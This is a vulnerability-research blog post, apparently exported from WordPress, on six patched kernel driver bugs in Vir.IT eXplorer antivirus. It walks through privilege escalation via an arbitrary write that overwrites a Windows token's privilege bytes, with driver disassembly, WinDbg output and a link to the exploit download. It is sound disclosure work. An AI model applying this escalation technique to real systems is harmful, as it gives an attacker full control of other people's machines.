{"id":990,"date":"2017-11-02T10:56:34","date_gmt":"2017-11-02T09:56:34","guid":{"rendered":"http:\/\/www.greyhathacker.net\/?p=990"},"modified":"2022-04-12T12:27:04","modified_gmt":"2022-04-12T11:27:04","slug":"exploiting-vir-it-explorer-anti-virus-arbitrary-write-vulnerability","status":"publish","type":"post","link":"https:\/\/www.greyhathacker.net\/?p=990","title":{"rendered":"Exploiting Vir.IT eXplorer Anti-Virus Arbitrary Write Vulnerability"},"content":{"rendered":"

Last month I started hunting for kernel bugs again and it wasn\u2019t too long before I found a nice collection of bugs in an antivirus product called Vir.IT eXplorer. In total 6 kernel vulnerabilities were discovered. All of the vulnerabilities were due to the inputted buffer not being validated. The below table lists the ioctls, related CVE and type of vulnerability<\/p>\n\n\n\n\n\n\n\n\n\n
IOCTL<\/strong><\/td>\nCVE ID<\/strong><\/td>\nVulnerability Type<\/strong><\/td>\n<\/tr>\n
0x82730078<\/td>\nCVE-2017-16233<\/td>\nBuffer Overflow<\/td>\n<\/tr>\n
0x82730048<\/td>\nCVE-2017-16234<\/td>\nDenial of Service<\/td>\n<\/tr>\n
0x82730098<\/td>\nCVE-2017-16235<\/td>\nArbitrary Write<\/td>\n<\/tr>\n
0x82730028<\/td>\nCVE-2017-16236<\/td>\nDenial of Service<\/td>\n<\/tr>\n
0x8273007C<\/td>\nCVE-2017-16237<\/td>\nArbitrary Write<\/td>\n<\/tr>\n
0x82730080<\/td>\nCVE-2017-16238<\/td>\nArbitrary Write<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

All of the vulnerabilities were fixed and an updated product released within a day.<\/p>\n\n\n\n\n\n\n
\u00a0<\/strong><\/td>\nVulnerable version<\/strong><\/td>\nFixed version<\/strong><\/td>\n<\/tr>\n
Software<\/td>\n8.5.39<\/td>\n8.5.42<\/td>\n<\/tr>\n
Viragtlt.sys<\/td>\n1.80.0.0<\/td>\n1.81.0.0<\/td>\n<\/tr>\n
Viraglt64.sys<\/td>\n1.0.0.11<\/td>\n1.0.0.12<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

I decided to exploit the ioctl 0x8273007C by overwriting the _SEP_TOKEN_PRIVILEGES structure.<\/p>\n

<\/p>\n

Here I am overwriting certain offsets of the _SEP_TOKEN_PRIVILEGES structure with byte 0x11, actually overwriting a byte in the “Present” field and a byte in the “Enabled” field. This will give us the “SeDebugPrivilege” privilege. Once the privilege has been obtained all that needs doing is to inject shellcode into a privileged process. The reason we need two writes as Kyriakos Economou @kyREcon <\/a>pointed out in Windows 10 (1703) the “Enabled” privileges are checked against “Present” privileges. You can read Kyriakos’s paper here<\/a><\/p>\n

For this exploit you can overwrite with whatever values\/offsets you like to get the desired privileges, I just happened to use value 0x11 in this case knowing it will give me the “SeDebugPrivilege” privilege as I had previously written another exploit which I’m still waiting to publish once that software fix has been released.<\/p>\n

The vulnerable code has two XCHG instructions used to overwrite the _SEP_TOKEN_PRIVILEGES structure “Present” and “Enabled” field bytes in one go.<\/p>\n

loc_FFFFF88000DE3E79:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0 mov\u00a0\u00a0\u00a0\u00a0 rbp, [rdi]\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0; rdi points to input buffer \r\n\u00a0 mov\u00a0\u00a0\u00a0\u00a0 rsi, cr8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0; rbp holds our SEP address - input[0]\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, 2\r\n\u00a0 cmp\u00a0\u00a0\u00a0\u00a0 sil, cl\r\n\u00a0 jnb\u00a0\u00a0\u00a0\u00a0 short loc_FFFFF88000DE3E95\r\n\u00a0 mov\u00a0\u00a0\u00a0\u00a0 rax, cr8\r\n\u00a0 mov\u00a0\u00a0\u00a0\u00a0 cr8, rcx\r\n\u00a0 mov\u00a0\u00a0\u00a0\u00a0 sil, al\r\nloc_FFFFF88000DE3E95:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0 call\u00a0\u00a0\u00a0 sub_FFFFF88000DEC128\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0 mov\u00a0\u00a0\u00a0\u00a0 rcx, [rdi+8]\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0; rcx holds \"Present\" bytes - input[1]\r\n\u00a0 xchg\u00a0\u00a0\u00a0 rcx, [rbp+0]\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0; Overwriting \"Present\" bytes<\/span>\r\n\u00a0 mov\u00a0\u00a0\u00a0\u00a0 rdx, [rdi+10h]\u00a0\u00a0\u00a0\u00a0\u00a0; rdx holds \"Enabled\" bytes - input[2] \r\n\u00a0 xchg\u00a0\u00a0\u00a0 rdx, [rbp+8]\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0; Overwriting \"Enabled\" bytes<\/span><\/pre>\n
Looking at our _SEP_TOKEN_PRIVILEGES structure in WinDbg<\/p>\n
kd> !process 0 0 cve-2017-16237.exe\r\nPROCESS fffffa8032939600<\/span>\r\n\u00a0\u00a0\u00a0 SessionId: 1\u00a0 Cid: 05bc\u00a0\u00a0\u00a0 Peb: 7fffffd6000\u00a0 ParentCid: 0644\r\n\u00a0\u00a0\u00a0 DirBase: 32c17000\u00a0 ObjectTable: fffff8a001d4a580\u00a0 HandleCount:\u00a0 13.\r\n\u00a0\u00a0\u00a0 Image: cve-2017-16237.exe\r\n\r\nkd> !process fffffa8032939600 1\r\nPROCESS fffffa8032939600\r\n\u00a0\u00a0\u00a0 SessionId: 1\u00a0 Cid: 05bc\u00a0\u00a0\u00a0 Peb: 7fffffd6000\u00a0 ParentCid: 0644\r\n\u00a0\u00a0\u00a0 DirBase: 32c17000\u00a0 ObjectTable: fffff8a001d4a580\u00a0 HandleCount:\u00a0 13.\r\n\u00a0\u00a0\u00a0 Image: cve-2017-16237.exe\r\n\u00a0\u00a0\u00a0 VadRoot fffffa80323a91b0 Vads 27 Clone 0 Private 2014. Modified 0. Locked 0.\r\n\u00a0\u00a0\u00a0 DeviceMap fffff8a003a77760\r\n\u00a0\u00a0\u00a0 Token\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 fffff8a0031a8060<\/span>\r\n\u00a0\u00a0\u00a0 ElapsedTime\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 00:00:00.686\r\n\u00a0\u00a0\u00a0 UserTime\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 00:00:00.000\r\n\u00a0\u00a0\u00a0 KernelTime\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 00:00:00.000\r\n\u00a0\u00a0\u00a0 QuotaPoolUsage[PagedPool]\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0\r\n\u00a0\u00a0\u00a0 QuotaPoolUsage[NonPagedPool]\u00a0\u00a0\u00a0\u00a0\u00a0 0\r\n\u00a0\u00a0\u00a0 Working Set Sizes (now,min,max)\u00a0 (2362, 50, 345) (9448KB, 200KB, 1380KB)\r\n\u00a0\u00a0\u00a0 PeakWorkingSetSize\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2362\r\n\u00a0\u00a0\u00a0 VirtualSize\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 16 Mb\r\n\u00a0\u00a0\u00a0 PeakVirtualSize\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 16 Mb\r\n\u00a0\u00a0\u00a0 PageFaultCount\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2359\r\n\u00a0\u00a0\u00a0 MemoryPriority\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 BACKGROUND\r\n\u00a0\u00a0\u00a0 BasePriority\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 8\r\n\u00a0\u00a0\u00a0 CommitCharge\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2089\r\n\r\nkd> dt nt!_TOKEN fffff8a0031a8060\r\n\u00a0\u00a0 +0x000 TokenSource\u00a0\u00a0\u00a0\u00a0\u00a0 : _TOKEN_SOURCE\r\n\u00a0\u00a0 +0x010 TokenId\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : _LUID\r\n\u00a0\u00a0 +0x018 AuthenticationId : _LUID\r\n\u00a0\u00a0 +0x020 ParentTokenId\u00a0\u00a0\u00a0 : _LUID\r\n\u00a0\u00a0 +0x028 ExpirationTime\u00a0\u00a0 : _LARGE_INTEGER 0x7fffffff`ffffffff\r\n\u00a0\u00a0 +0x030 TokenLock\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0xfffffa80`31e23d40 _ERESOURCE\r\n\u00a0\u00a0 +0x038 ModifiedId\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : _LUID\r\n\u00a0\u00a0 +0x040 Privileges\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : _SEP_TOKEN_PRIVILEGES<\/span>\r\n\u00a0\u00a0 +0x058 AuditPolicy\u00a0\u00a0\u00a0\u00a0\u00a0 : _SEP_AUDIT_POLICY\r\n\u00a0\u00a0 +0x074 SessionId\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 1\r\n\u00a0\u00a0 +0x078 UserAndGroupCount : 0xf\r\n\u00a0\u00a0 +0x07c RestrictedSidCount : 0\r\n\u00a0\u00a0 +0x080 VariableLength\u00a0\u00a0 : 0x2c0\r\n\u00a0\u00a0 +0x084 DynamicCharged\u00a0\u00a0 : 0x400\r\n\u00a0\u00a0 +0x088 DynamicAvailable : 0\r\n\u00a0\u00a0 +0x08c DefaultOwnerIndex : 0\r\n\u00a0\u00a0 +0x090 UserAndGroups\u00a0\u00a0\u00a0 : 0xfffff8a0`031a8370 _SID_AND_ATTRIBUTES\r\n\u00a0\u00a0 +0x098 RestrictedSids\u00a0\u00a0 : (null) \r\n\u00a0\u00a0 +0x0a0 PrimaryGroup\u00a0\u00a0\u00a0\u00a0 : 0xfffff8a0`03202830 Void\r\n\u00a0\u00a0 +0x0a8 DynamicPart\u00a0\u00a0\u00a0\u00a0\u00a0 : 0xfffff8a0`03202830\u00a0 -> 0x501\r\n\u00a0\u00a0 +0x0b0 DefaultDacl\u00a0\u00a0\u00a0\u00a0\u00a0 : 0xfffff8a0`0320284c _ACL\r\n\u00a0\u00a0 +0x0b8 TokenType\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 1 ( TokenPrimary )\r\n\u00a0\u00a0 +0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )\r\n\u00a0\u00a0 +0x0c0 TokenFlags\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x2a00\r\n\u00a0\u00a0 +0x0c4 TokenInUse\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x1 ''\r\n\u00a0\u00a0 +0x0c8 IntegrityLevelIndex : 0xe\r\n\u00a0\u00a0 +0x0cc MandatoryPolicy\u00a0 : 3\r\n\u00a0\u00a0 +0x0d0 LogonSession\u00a0\u00a0\u00a0\u00a0 : 0xfffff8a0`03b398a0 _SEP_LOGON_SESSION_REFERENCES\r\n\u00a0\u00a0 +0x0d8 OriginatingLogonSession : _LUID\r\n\u00a0\u00a0 +0x0e0 SidHash\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : _SID_AND_ATTRIBUTES_HASH\r\n\u00a0\u00a0 +0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH\r\n\u00a0\u00a0 +0x300 pSecurityAttributes : 0xfffff8a0`0328df10 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION\r\n\u00a0\u00a0 +0x308 SessionObject\u00a0\u00a0\u00a0 : 0xfffffa80`320f83e0 Void\r\n\u00a0\u00a0 +0x310 VariablePart\u00a0\u00a0\u00a0\u00a0 : 0xfffff8a0`031a8460<\/pre>\n
Before overwriting the bytes it will look like<\/p>\n
kd> dt nt!_SEP_TOKEN_PRIVILEGES fffff8a0031a8060+40\r\n\u00a0\u00a0 +0x000 Present\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x6`02880000\r\n\u00a0\u00a0 +0x008 Enabled\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x800000\r\n\u00a0\u00a0 +0x010 EnabledByDefault : 0x800000\r\n\r\nkd> db fffff8a0031a8060+40 l18\r\nfffff8a0`031a80a0\u00a0 00 00 88 02 06 00 00 00-00 00 80 00 00 00 00 00\u00a0 ................\r\nfffff8a0`031a80b0\u00a0 00 00 80 00 00 00 00 00\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ........<\/pre>\n
and afterwards<\/p>\n
kd> dt nt!_SEP_TOKEN_PRIVILEGES fffff8a0031a8060+40\r\n\u00a0\u00a0 +0x000 Present\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x6`02110000\r\n\u00a0\u00a0 +0x008 Enabled\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x110000\r\n\u00a0\u00a0 +0x010 EnabledByDefault : 0x800000\r\n\r\nkd> db fffff8a0031a8060+40 l18\r\nfffff8a0`02b08a70\u00a0 00 00 11<\/span> 02 06 00 00 00-00 00 11<\/span> 00 00 00 00 00\u00a0 ................\r\nfffff8a0`02b08a80\u00a0 00 00 80 00 00 00 00 00\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ........\r\n\r\n<\/pre>\n
Checking the privileges<\/p>\n
kd> !token fffff8a0031a8060\r\n_TOKEN fffff8a0031a8060\r\nTS Session ID: 0x1\r\nUser: S-1-5-21-2231847605-3015871416-1385684711-1000\r\nGroups: \r\n\u00a000 S-1-5-21-2231847605-3015871416-1385684711-513\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a001 S-1-1-0\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a002 S-1-5-114\r\n\u00a0\u00a0\u00a0 Attributes - DenyOnly \r\n\u00a003 S-1-5-32-544\r\n\u00a0\u00a0\u00a0 Attributes - DenyOnly \r\n\u00a004 S-1-5-32-545\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a005 S-1-5-4\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a006 S-1-2-1\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a007 S-1-5-11\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a008 S-1-5-15\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a009 S-1-5-113\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a010 S-1-5-5-0-118426\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled LogonId \r\n\u00a011 S-1-2-0\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a012 S-1-5-64-10\r\n\u00a0\u00a0\u00a0 Attributes - Mandatory Default Enabled \r\n\u00a013 S-1-16-8192\r\n\u00a0\u00a0\u00a0 Attributes - GroupIntegrity GroupIntegrityEnabled \r\nPrimary Group: S-1-5-21-2231847605-3015871416-1385684711-513\r\nPrivs: \r\n\u00a016 0x000000010 SeCreatePermanentPrivilege\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Attributes - Enabled \r\n\u00a020 0x000000014 SeDebugPrivilege\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Attributes - Enabled<\/span> \r\n\u00a025 0x000000019 SeUndockPrivilege\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Attributes - \r\n\u00a033 0x000000021 SeIncreaseWorkingSetPrivilege\u00a0\u00a0\u00a0\u00a0 Attributes - \r\n\u00a034 0x000000022 SeTimeZonePrivilege\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Attributes - \r\nAuthentication ID:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 (0,1d038)\r\nImpersonation Level:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Anonymous\r\nTokenType:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Primary\r\nSource: User32\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 TokenFlags: 0x2a00 ( Token in use )\r\nToken ID: e8a62\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ParentToken ID: 1d03b\r\nModified ID:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 (0, e8571)\r\nRestrictedSidCount: 0\u00a0\u00a0\u00a0\u00a0\u00a0 RestrictedSids: 0000000000000000\r\nOriginatingLogonSession: 3e7<\/pre>\n
The exploit is written only to work from a medium integrity process as I’m using the NtQuerySystemInformation(SystemHandleInformation) API to leak the address of the process token. It has been tested on 64bit Windows 7 and Windows 10 (1709).<\/p>\n
<\/p>\n
The exploit can be downloaded from here [zip<\/a>] (pass “ghh”) or from Exploit-DB when it gets published.<\/p>\n
@ParvezGHH<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Last month I started hunting for kernel bugs again and it wasn\u2019t too long before I found a nice collection of bugs in an antivirus product called Vir.IT eXplorer. In total 6 kernel vulnerabilities were discovered. All of the vulnerabilities were due to the inputted buffer not being validated. The below table lists the ioctls, […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,8,7,6],"tags":[21,46],"class_list":["post-990","post","type-post","status-publish","format-standard","hentry","category-all","category-bugs","category-exploits","category-vulnerabilities","tag-elevate","tag-kernel"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/990","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=990"}],"version-history":[{"count":4,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/990\/revisions"}],"predecessor-version":[{"id":1112,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/990\/revisions\/1112"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=990"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=990"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=990"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}